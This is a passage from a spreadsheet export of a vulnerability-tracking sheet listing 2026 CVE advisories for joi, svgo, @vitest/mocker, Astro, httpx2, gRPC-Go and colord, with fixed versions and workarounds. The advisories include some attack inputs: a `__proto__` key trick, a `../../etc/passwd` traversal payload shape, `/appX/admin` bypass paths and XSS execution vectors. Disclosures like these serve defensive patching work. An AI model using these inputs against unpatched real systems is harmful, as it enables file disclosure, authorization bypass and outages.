This affects build-time static site generation only; request-time routing is not affected. Applications whose `ssgParams` values are entirely developer-controlled are not affected.</t></is></c><c r="T1633" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84365</t></is></c></row><row r="1634"><c r="A1634" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1634" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1634" s="5" t="inlineStr"><is><t>CVE-2026-84367</t></is></c><c r="D1634" s="5" t="inlineStr" /><c r="E1634" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1634" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1634" s="5" t="inlineStr" /><c r="H1634" s="5" t="n"><v>0.003</v></c><c r="I1634" s="5" t="inlineStr" /><c r="J1634" s="5" t="inlineStr" /><c r="K1634" s="5" t="inlineStr" /><c r="L1634" s="5" t="inlineStr"><is><t>npm:joi</t></is></c><c r="M1634" s="5" t="inlineStr"><is><t>17.13.5, 18.2.4</t></is></c><c r="N1634" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1634" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1634" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1634" s="5" t="inlineStr" /><c r="R1634" s="5" t="inlineStr" /><c r="S1634" s="5" t="inlineStr"><is><t>### Impact

Applications are affected only if a schema renames keys with a regular-expression source and a `Joi.expression()` / `Joi.x()` target that interpolates the pattern's own match data, combined with `{ multiple: true }`, for example `.rename(/^x-(.+)$/, Joi.x('{#1}'), { multiple: true })`. Because the target is rendered from the matched input key, an attacker who controls input keys can send `x-__proto__` with an object value and make the rename target render as `__proto__`, which sets the prototype of the object joi returns instead of creating a key on it. The global `Object.prototype` is not modified, so the effect is confined to the object returned by that one `validate()` call.

Schemas using a static string rename target are not affected, and neither are schemas left on the default `{ multiple: false }`.

### Patches

Versions 17.13.5 and 18.2.4 have been released to address the issue.

### Workarounds

1. Replace the template rename target with a static string target.
2. Keep the template but make the capture unable to produce `__proto__`, using a negative lookahead: `.rename(/^x-(?!__proto__$)(.+)$/, Joi.x('{#1}'), { multiple: true })`
3. Drop { multiple: true } from the rename, which stops the rename before the assignment.</t></is></c><c r="T1634" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84367</t></is></c></row><row r="1635"><c r="A1635" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1635" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1635" s="5" t="inlineStr"><is><t>CVE-2026-84368</t></is></c><c r="D1635" s="5" t="inlineStr" /><c r="E1635" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1635" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1635" s="5" t="inlineStr" /><c r="H1635" s="5" t="n"><v>0.003</v></c><c r="I1635" s="5" t="inlineStr" /><c r="J1635" s="5" t="inlineStr" /><c r="K1635" s="5" t="inlineStr" /><c r="L1635" s="5" t="inlineStr"><is><t>npm:@hapi/joi, npm:joi</t></is></c><c r="M1635" s="5" t="inlineStr"><is><t>17.13.6, 18.2.5</t></is></c><c r="N1635" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1635" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1635" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1635" s="5" t="inlineStr" /><c r="R1635" s="5" t="inlineStr" /><c r="S1635" s="5" t="inlineStr"><is><t>### Impact
An application that passes attacker-controlled data into joi's custom message configuration (`messages()`, `message()`, `prefs({ messages })`, `Joi.extend({ messages })` or `rule({ message })`) lets the attacker write properties onto `Object.prototype`, where every object in the process then inherits them. A key named `__proto__` was treated as a language name, and the code reused the object it found at that key, which resolves to the prototype rather than to a new own property; a key named `constructor` did the same to the `Object` function's statics. A consuming application that gates on the mere presence of a property (`if (user.isAdmin)`) can be made to take the wrong branch for every object it inspects.

This is not reachable from data that joi validates. Custom messages are schema-construction configuration, normally written by the application developer. Exploitation therefore requires an application that feeds untrusted input straight into schema construction.

### Patches
Upgrade to version 18.2.5 or 17.13.6.

### Workarounds
Do not pass untrusted input into `messages()`, `message()`, `prefs({ messages })`, `Joi.extend({ messages })` or `rule({ message })`. Or validate that they don't contain any `__proto__` or `constructor` property.</t></is></c><c r="T1635" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84368</t></is></c></row><row r="1636"><c r="A1636" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1636" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1636" s="5" t="inlineStr"><is><t>CVE-2026-84369</t></is></c><c r="D1636" s="5" t="inlineStr" /><c r="E1636" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1636" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1636" s="5" t="inlineStr" /><c r="H1636" s="5" t="n"><v>0.003</v></c><c r="I1636" s="5" t="inlineStr" /><c r="J1636" s="5" t="inlineStr" /><c r="K1636" s="5" t="inlineStr" /><c r="L1636" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M1636" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N1636" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1636" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1636" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1636" s="5" t="inlineStr" /><c r="R1636" s="5" t="inlineStr" /><c r="S1636" s="5" t="inlineStr"><is><t>## Summary

SVGO's opt-in `removeScripts` plugin did not inspect executable HTML content inside SVG `&lt;foreignObject&gt;` elements. Applications that used this plugin as their only protection for untrusted SVG input could produce SVGs containing active HTML and expose users to cross-site scripting (XSS).

SVGO is an optimizer rather than a comprehensive sanitization library, but `removeScripts` is maintained for consumers that already rely on it to remove common script execution paths.

## Details

Although the plugin removed SVG and XHTML `&lt;script&gt;` elements, it left other HTML execution paths inside `&lt;foreignObject&gt;` unchanged. These included:

- event-handler attributes such as `onload` and `onbeforetoggle`;
- `srcdoc` documents, including on `&lt;iframe&gt;` elements;
- executable URLs in HTML attributes such as `action`, `data`, `formaction`, `href`, and `src`.

An attacker could place one of these payloads in an SVG. If an application optimized the untrusted SVG with `removeScripts` and then served the result in an active browser context, the payload could execute in the viewer's origin.

## Impact

Successful exploitation could allow script execution in the context where the optimized SVG is rendered. Depending on the embedding and origin configuration, this could expose cookies or local storage, modify content, or perform actions as the victim.

The plugin is opt-in, so consumers that do not enable `removeScripts`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preserves visual HTML inside SVG `&lt;foreignObject&gt;` elements while removing event attributes, `srcdoc`, and executable URL values from active HTML URL attributes.

SVGO v1 is no longer maintained. Users of v1 should upgrade to a supported release line.

## Workarounds

For hostile input, use a dedicated SVG sanitization tool before passing the SVG to SVGO. As defense in depth, applications can reject or remove `&lt;foreignObject&gt;` content and avoid serving user-controlled SVGs in an active same-origin context.</t></is></c><c r="T1636" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84369</t></is></c></row><row r="1637"><c r="A1637" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1637" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1637" s="5" t="inlineStr"><is><t>CVE-2026-84370</t></is></c><c r="D1637" s="5" t="inlineStr" /><c r="E1637" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1637" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1637" s="5" t="inlineStr" /><c r="H1637" s="5" t="n"><v>0.003</v></c><c r="I1637" s="5" t="inlineStr" /><c r="J1637" s="5" t="inlineStr" /><c r="K1637" s="5" t="inlineStr" /><c r="L1637" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M1637" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N1637" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1637" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1637" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1637" s="5" t="inlineStr" /><c r="R1637" s="5" t="inlineStr" /><c r="S1637" s="5" t="inlineStr"><is><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is></c><c r="T1637" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t></is></c></row><row r="1638"><c r="A1638" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1638" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1638" s="5" t="inlineStr"><is><t>CVE-2026-84373</t></is></c><c r="D1638" s="5" t="inlineStr" /><c r="E1638" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1638" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1638" s="5" t="inlineStr" /><c r="H1638" s="5" t="n"><v>0.004</v></c><c r="I1638" s="5" t="inlineStr" /><c r="J1638" s="5" t="inlineStr" /><c r="K1638" s="5" t="inlineStr" /><c r="L1638" s="5" t="inlineStr"><is><t>npm:@vitest/mocker, npm:vitest</t></is></c><c r="M1638" s="5" t="inlineStr"><is><t>4.1.11, 5.0.0-rc.2</t></is></c><c r="N1638" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1638" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1638" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1638" s="5" t="inlineStr" /><c r="R1638" s="5" t="inlineStr" /><c r="S1638" s="5" t="inlineStr"><is><t>## Summary
`@vitest/mocker` registers a redirect mock's target path without validating it
against the dev server's file-serving allowlist. An attacker who can reach the
dev server's WebSocket can register a redirect mock pointing outside the project
root; when the mocked module is requested, the plugin's `load` hook returns
`readFile(&lt;attacker path&gt;)` as the module source, disclosing local files.

This is exploitable **without authentication** only through the public
`mockerPlugin` / standalone `interceptorPlugin` exports (used by third-party dev
servers), which register the handler on Vite's unauthenticated HMR socket.
Vitest's own browser mode registers mocks over a **token-authenticated** RPC and
is not remotely reachable by default (see Scope).

## Affected code
`packages/mocker/src/node/interceptorPlugin.ts`.

The `load` hook is the file-read sink:

```ts
if (mock.type === 'redirect') {
  return readFile(mock.redirect, 'utf-8')
}
```

`mock.redirect` is derived from client input at registration time with no
boundary check:

```ts
if (event.type === 'redirect') {
  const redirectUrl = new URL(event.redirect)
  event.redirect = join(server.config.root, redirectUrl.pathname)
}
registry.register(event)
```

There is no `server.fs.allow` / `server.fs.deny` check and no assertion that the
resolved path stays within the project root.

## Registration paths and trust boundaries
- **Public `mockerPlugin` / `interceptorPlugin` (unauthenticated).** In
  `configureServer`, the plugin registers `server.ws.on('vitest:interceptor:register', …)`
  on Vite's HMR WebSocket. That socket performs no token, Origin, or same-origin
  check, so any client that can reach it can register a redirect mock. This is
  the path the "unauthenticated" impact applies to.
- **Vitest browser mode (authenticated).** Mocks register over the browser RPC
  (`registerMock`), which sits behind a per-run token (`isValidApiRequest`, a
  random `api.token`). The interceptor's `configureServer` socket is not used for
  registration here (in v5 it does not run at all, as the plugin is injected per
  environment). The same missing boundary check exists on the authenticated RPC
  path, but reaching it requires the token, so it is not a remote-unauthenticated
  read.

## Path handling
`new URL(redirect).pathname` combined with `join(root, pathname)` does **not**
confine reads to the root:

- Special/hierarchical schemes (`file:`, `http:`) are normalized by WHATWG URL,
  so `..` segments are collapsed and the result stays under the root. Payloads of
  the form `file:///../../etc/passwd` do **not** escape.
- A non-special (opaque) scheme preserves `..` in `pathname`, so
  `join(root, "../../…/etc/passwd")` resolves outside the root and reads an
  arbitrary file.

Even without escaping the root, the missing `server.fs` check allows reading any
in-root file the dev server would otherwise refuse to serve (for example an
in-root `.env` or source that is denied by `server.fs.deny`).

## Scope / preconditions
- This is a **development-server** issue. The dev server binds to `localhost` by
  default and is not reachable from the network unless the developer exposes it
  (`server.host` / `0.0.0.0`, a LAN bind, or a proxy).
- A raw (non-browser) client against a reachable server bypasses browser origin
  and CORS protections entirely and can both register the mock and read the
  response.
- A browser-based drive-by against a localhost server is substantially mitigated
  by Vite defaults: the default CORS origin allowlist is limited to `localhost`
  origins, and `server.allowedHosts` blocks DNS-rebinding, so a cross-origin page
  cannot read the file contents back.

## Impact
Disclosure of local files readable by the dev-server process (source, in-root
`.env`/secrets, and, via the opaque-scheme payload, files outside the project
root). No integrity or availability impact.

## Affected versions
Present since `@vitest/mocker` was introduced.

- **Affected: `@vitest/mocker` &gt;= 2.1.0** (shipped in `vitest` and
  `@vitest/browser` &gt;= 2.1.0), through 4.1.x and the 5.0.0 pre-releases.
- **Fixed:** Vitest 4.1.11 and 5.0.0. Older majors (2.1.x, 3.x) are not
  maintained and are not planned to receive the fix.

## Fix
Validate the resolved redirect target against Vite's file-serving allowlist
(`isFileLoadingAllowed`) before registering it, at every registration site, and
stop registering the interceptor WebSocket events in Vitest's browser mode
(mocks there flow through the authenticated RPC).</t></is></c><c r="T1638" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84373</t></is></c></row><row r="1639"><c r="A1639" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1639" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1639" s="5" t="inlineStr"><is><t>CVE-2026-84375</t></is></c><c r="D1639" s="5" t="inlineStr" /><c r="E1639" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1639" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1639" s="5" t="inlineStr" /><c r="H1639" s="5" t="n"><v>0.004</v></c><c r="I1639" s="5" t="inlineStr" /><c r="J1639" s="5" t="inlineStr" /><c r="K1639" s="5" t="inlineStr" /><c r="L1639" s="5" t="inlineStr"><is><t>npm:js-yaml</t></is></c><c r="M1639" s="5" t="inlineStr"><is><t>3.15.2, 4.3.2</t></is></c><c r="N1639" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1639" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1639" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1639" s="5" t="inlineStr" /><c r="R1639" s="5" t="inlineStr" /><c r="S1639" s="5" t="inlineStr"><is><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is></c><c r="T1639" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t></is></c></row><row r="1640"><c r="A1640" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1640" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1640" s="5" t="inlineStr"><is><t>CVE-2026-84376</t></is></c><c r="D1640" s="5" t="inlineStr" /><c r="E1640" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1640" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1640" s="5" t="inlineStr" /><c r="H1640" s="5" t="n"><v>0.004</v></c><c r="I1640" s="5" t="inlineStr" /><c r="J1640" s="5" t="inlineStr" /><c r="K1640" s="5" t="inlineStr" /><c r="L1640" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M1640" s="5" t="inlineStr"><is><t>7.2.4</t></is></c><c r="N1640" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1640" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1640" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1640" s="5" t="inlineStr" /><c r="R1640" s="5" t="inlineStr" /><c r="S1640" s="5" t="inlineStr"><is><t>## Summary

Astro stripped a configured `base` path from request pathnames using a string-prefix check that did not verify a path-segment boundary. With `base: "/app"`, a request to `/appX/admin` was treated as being under the base and resolved internally to the `/admin` route, while middleware still observed the public pathname `/appX/admin`. Middleware that authorizes routes by inspecting `context.url.pathname` could therefore be bypassed.

## Impact

An unauthenticated remote attacker can bypass pathname-based middleware authorization in applications that:

- Configure a non-root `base`.
- Protect base-prefixed routes in middleware using `context.url.pathname`.

Because routing and middleware resolved different effective pathnames, a request such as `/appX/admin` (or other single-character extensions like `/app2/admin` or `/app-/admin`) reached the protected `/admin` route without passing the middleware check that guards `/app/admin`. Astro's authentication guide demonstrates protecting routes in middleware via `context.url.pathname`, so this is a reasonable and expected pattern.

## Affected versions

`astro` &lt;= 7.2.3.

## Patches

Fixed in `astro` 7.2.4. Base stripping now requires the pathname to equal the base without its trailing slash, or to be followed by a `/`, so a prefix that does not end on a path-segment boundary is no longer treated as being under the base. Routing and `context.url.pathname` now resolve the same pathname.

## Workarounds

Upgrade to `astro` 7.2.4 or later. As a mitigation before upgrading, avoid relying solely on prefix checks of `context.url.pathname` for authorization, or reject requests whose pathname does not begin with the configured base followed by a path-segment boundary.

## Credits

Reported by @Ryoga-exe.</t></is></c><c r="T1640" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84376</t></is></c></row><row r="1641"><c r="A1641" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1641" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1641" s="5" t="inlineStr"><is><t>CVE-2026-84378</t></is></c><c r="D1641" s="5" t="inlineStr" /><c r="E1641" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1641" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1641" s="5" t="inlineStr" /><c r="H1641" s="5" t="n"><v>0.003</v></c><c r="I1641" s="5" t="inlineStr" /><c r="J1641" s="5" t="inlineStr" /><c r="K1641" s="5" t="inlineStr" /><c r="L1641" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1641" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N1641" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1641" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1641" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1641" s="5" t="inlineStr" /><c r="R1641" s="5" t="inlineStr" /><c r="S1641" s="5" t="inlineStr"><is><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is></c><c r="T1641" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84378</t></is></c></row><row r="1642"><c r="A1642" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1642" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1642" s="5" t="inlineStr"><is><t>CVE-2026-84379</t></is></c><c r="D1642" s="5" t="inlineStr" /><c r="E1642" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1642" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1642" s="5" t="inlineStr" /><c r="H1642" s="5" t="n"><v>0.003</v></c><c r="I1642" s="5" t="inlineStr" /><c r="J1642" s="5" t="inlineStr" /><c r="K1642" s="5" t="inlineStr" /><c r="L1642" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1642" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N1642" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1642" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1642" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1642" s="5" t="inlineStr" /><c r="R1642" s="5" t="inlineStr" /><c r="S1642" s="5" t="inlineStr"><is><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is></c><c r="T1642" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84379</t></is></c></row><row r="1643"><c r="A1643" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1643" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1643" s="5" t="inlineStr"><is><t>CVE-2026-84380</t></is></c><c r="D1643" s="5" t="inlineStr" /><c r="E1643" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1643" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1643" s="5" t="inlineStr" /><c r="H1643" s="5" t="n"><v>0.002</v></c><c r="I1643" s="5" t="inlineStr" /><c r="J1643" s="5" t="inlineStr" /><c r="K1643" s="5" t="inlineStr" /><c r="L1643" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1643" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N1643" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1643" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1643" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1643" s="5" t="inlineStr" /><c r="R1643" s="5" t="inlineStr" /><c r="S1643" s="5" t="inlineStr"><is><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is></c><c r="T1643" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84380</t></is></c></row><row r="1644"><c r="A1644" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1644" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1644" s="5" t="inlineStr"><is><t>CVE-2026-84381</t></is></c><c r="D1644" s="5" t="inlineStr" /><c r="E1644" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1644" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1644" s="5" t="inlineStr" /><c r="H1644" s="5" t="n"><v>0.001</v></c><c r="I1644" s="5" t="inlineStr" /><c r="J1644" s="5" t="inlineStr" /><c r="K1644" s="5" t="inlineStr" /><c r="L1644" s="5" t="inlineStr"><is><t>PyPI:httpcore2, PyPI:httpx2</t></is></c><c r="M1644" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N1644" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1644" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1644" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1644" s="5" t="inlineStr" /><c r="R1644" s="5" t="inlineStr" /><c r="S1644" s="5" t="inlineStr"><is><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is></c><c r="T1644" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t></is></c></row><row r="1645"><c r="A1645" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1645" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1645" s="5" t="inlineStr"><is><t>CVE-2026-84382</t></is></c><c r="D1645" s="5" t="inlineStr" /><c r="E1645" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1645" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1645" s="5" t="inlineStr" /><c r="H1645" s="5" t="n"><v>0.004</v></c><c r="I1645" s="5" t="inlineStr" /><c r="J1645" s="5" t="inlineStr" /><c r="K1645" s="5" t="inlineStr" /><c r="L1645" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1645" s="5" t="inlineStr"><is><t>2.12.0</t></is></c><c r="N1645" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1645" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1645" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1645" s="5" t="inlineStr" /><c r="R1645" s="5" t="inlineStr" /><c r="S1645" s="5" t="inlineStr"><is><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is></c><c r="T1645" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t></is></c></row><row r="1646"><c r="A1646" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1646" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1646" s="5" t="inlineStr"><is><t>CVE-2026-84445</t></is></c><c r="D1646" s="5" t="inlineStr" /><c r="E1646" s="5" t="inlineStr" /><c r="F1646" s="5" t="inlineStr" /><c r="G1646" s="5" t="inlineStr" /><c r="H1646" s="5" t="n"><v>0.007</v></c><c r="I1646" s="5" t="inlineStr" /><c r="J1646" s="5" t="inlineStr" /><c r="K1646" s="5" t="inlineStr" /><c r="L1646" s="5" t="inlineStr"><is><t>Go:google.golang.org/grpc</t></is></c><c r="M1646" s="5" t="inlineStr"><is><t>1.82.2, 1.83.2, 1.85.0-dev.0.20260825072537-93e31b48545e</t></is></c><c r="N1646" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1646" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1646" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1646" s="5" t="inlineStr" /><c r="R1646" s="5" t="inlineStr" /><c r="S1646" s="5" t="inlineStr"><is><t>A vulnerability exists in gRPC-Go servers configured with `xds.NewGRPCServer()` where a crafted request missing both `:authority` and `Host` headers can cause a server panic, resulting in a Denial of Service (DoS).

Servers built with `xds.NewGRPCServer` install an xDS routing interceptor on every RPC. This interceptor looks up the request’s `:authority` header to pick a virtual host. The HTTP/2 server transport previously accepted requests that had neither `:authority` nor `Host`. When this happened, the xDS routing interceptor attempted to access the first element of an empty slice of authorities, leading to an index out of bounds panic. Since the per-RPC goroutine does not recover from panics, the entire server process would terminate.

This panic occurs in the interceptor pipeline, meaning the transport credentials handshake (TLS, mTLS, or ALTS) and HTTP/2 connection establishment must complete successfully before the crafted request can reach this logic.
- Insecure/Standard TLS: If the server permits insecure (plaintext) connections or standard credentials (where client certs are not checked), any unauthenticated remote attacker can trigger the crash.
- mTLS / ALTS: If strict transport-level authentication is enforced at the network edge or transport layer (e.g., requiring a valid client certificate), the attacker must possess valid transport credentials to initiate the stream and trigger the panic.

### Impact
An attacker can cause a complete outage of the gRPC server by sending a request missing both `:authority` and `Host` headers, provided they can successfully establish a transport connection.

### Patches
The issue has been addressed in `master` (and backported to `1.83.2` and `1.82.2`). The fix updates the HTTP/2 transport layer to reject requests missing both `:authority` and `Host` headers early, maintaining consistency with and other gRPC language implementations.</t></is></c><c r="T1646" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84445</t></is></c></row><row r="1647"><c r="A1647" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1647" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1647" s="5" t="inlineStr"><is><t>CVE-2026-84452</t></is></c><c r="D1647" s="5" t="inlineStr" /><c r="E1647" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1647" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1647" s="5" t="inlineStr" /><c r="H1647" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1647" s="5" t="inlineStr" /><c r="J1647" s="5" t="inlineStr" /><c r="K1647" s="5" t="inlineStr" /><c r="L1647" s="5" t="inlineStr"><is><t>PyPI:winml-cli</t></is></c><c r="M1647" s="5" t="inlineStr"><is><t>0.4.0</t></is></c><c r="N1647" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1647" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1647" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1647" s="5" t="inlineStr" /><c r="R1647" s="5" t="inlineStr" /><c r="S1647" s="5" t="inlineStr"><is><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is></c><c r="T1647" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84452</t></is></c></row><row r="1648"><c r="A1648" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1648" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1648" s="5" t="inlineStr"><is><t>CVE-2026-85061</t></is></c><c r="D1648" s="5" t="inlineStr" /><c r="E1648" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1648" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1648" s="5" t="inlineStr" /><c r="H1648" s="5" t="n"><v>0.003</v></c><c r="I1648" s="5" t="inlineStr" /><c r="J1648" s="5" t="inlineStr" /><c r="K1648" s="5" t="inlineStr" /><c r="L1648" s="5" t="inlineStr"><is><t>npm:maplibre-gl</t></is></c><c r="M1648" s="5" t="inlineStr"><is><t>6.4.1</t></is></c><c r="N1648" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1648" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1648" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1648" s="5" t="inlineStr" /><c r="R1648" s="5" t="inlineStr" /><c r="S1648" s="5" t="inlineStr"><is><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is></c><c r="T1648" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t></is></c></row><row r="1649"><c r="A1649" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1649" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1649" s="5" t="inlineStr"><is><t>CVE-2026-85062</t></is></c><c r="D1649" s="5" t="inlineStr" /><c r="E1649" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1649" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1649" s="5" t="inlineStr" /><c r="H1649" s="5" t="n"><v>0.003</v></c><c r="I1649" s="5" t="inlineStr" /><c r="J1649" s="5" t="inlineStr" /><c r="K1649" s="5" t="inlineStr" /><c r="L1649" s="5" t="inlineStr"><is><t>npm:colord</t></is></c><c r="M1649" s="5" t="inlineStr"><is><t>2.9.4</t></is></c><c r="N1649" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1649" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1649" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1649" s="5" t="inlineStr" /><c r="R1649" s="5" t="inlineStr" /><c r="S1649" s="5" t="inlineStr"><is><t>### Impact

`colord`'s CSS color string matchers described a number as `([+-]?\d*\.?\d+)`. In that form `\d*` and `\d+` can match the same digits, so a run of *n* digits can be divided between them in O(n²) ways, and rejecting an input retries every division. Parsing is synchronous and uninterruptible, so a long malformed color string blocks the thread:

| input | time to reject |
| --- | --- |
